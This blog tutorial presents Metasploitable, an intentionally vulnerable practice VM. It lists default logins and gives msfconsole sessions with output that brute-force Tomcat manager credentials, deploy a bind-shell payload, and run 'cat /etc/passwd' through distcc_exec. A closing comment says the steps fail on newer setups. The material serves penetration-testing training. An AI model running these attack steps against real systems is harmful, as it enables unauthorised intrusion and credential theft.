Metasploitable - your first training ground

Metasploitable is a VMware based virtual machine running Ubuntu 8.04 server. A number of vulnerable services have been included, some of which are an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older version of mysql server.

You can use VMware Player to run it, but be aware that you don’t want is exposed to the Internet, so carefully choose what type of networking you will use in the virtual machine. It’s configured in non-persistent-disk mode, so if you mess up something you can just reset it, and here are some of the credentials that you can use to access it:

msfadmin:msfadmin
user:user
service:service
postgres:postgres
klog:123456789

Here are a couple of the things you can do with it in msfconsole:

Using the ‘Tomcat Application Manager Login Utility’, you can test credentials against a Tomcat application (assuming the manager component is enabled):

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit


[*] 10.0.1.88:8180 – Trying username:’tomcat’ with password:’role1′
[-] http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘tomcat’
[*] 10.0.1.88:8180 – Trying username:’tomcat’ with password:’root’
[-] http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘tomcat’
[*] 10.0.1.88:8180 – Trying username:’tomcat’ with password:’tomcat’
[+] http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’
[*] 10.0.1.88:8180 – Trying username:’both’ with password:’admin’

There you go – a valid (tomcat:tomcat) login. – Now that we have valid credentials, we can try the Tomcat Manager Application Deployer (tomcat_mgr_deploy) :

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target…
[*] Automatically selected target “Linux X86”
[*] Uploading 1612 bytes as HJpy1H.war …
[*] Executing /HJpy1H/EpKaNLsCQUUjo.jsp…
[*] Undeploying HJpy1H …
[*] Sending stage (36 bytes) to metasploitable
[*] Command shell session 1 opened (10.0.1.21:39497 -> 10.0.1.88:4444) at 2010-05-12 19:54:16 -0200

The distcc_exec module is also a nice exploit to play with – in this case, by using a command payload to ‘cat /etc/passwd’:

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/generic
msf exploit(distcc_exec) > set RHOST metasploitable
msf exploit(distcc_exec) > set CMD 'cat /etc/passwd'
msf exploit(distcc_exec) > exploit
connecting...

[*] stdout: root:x:0:0:root:/root:/bin/bash
[*] stdout: daemon:x:1:1:daemon:/usr/sbin:/bin/sh

So no need to wait any more – just download Metasploitable and start improving your Metasploit skills!

1 comment to Metasploitable – your first training ground

  • Visitor666

    These do not work. You get an error that the payload is not compatible on the first one (set PAYLOAD linux/x86/shell_bind_tcp) and the second one spits out nothing.

    Backtrack 5 R2 and R3 – 64 bit versions. I can change the payload on the first one and get damon, but not root.

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*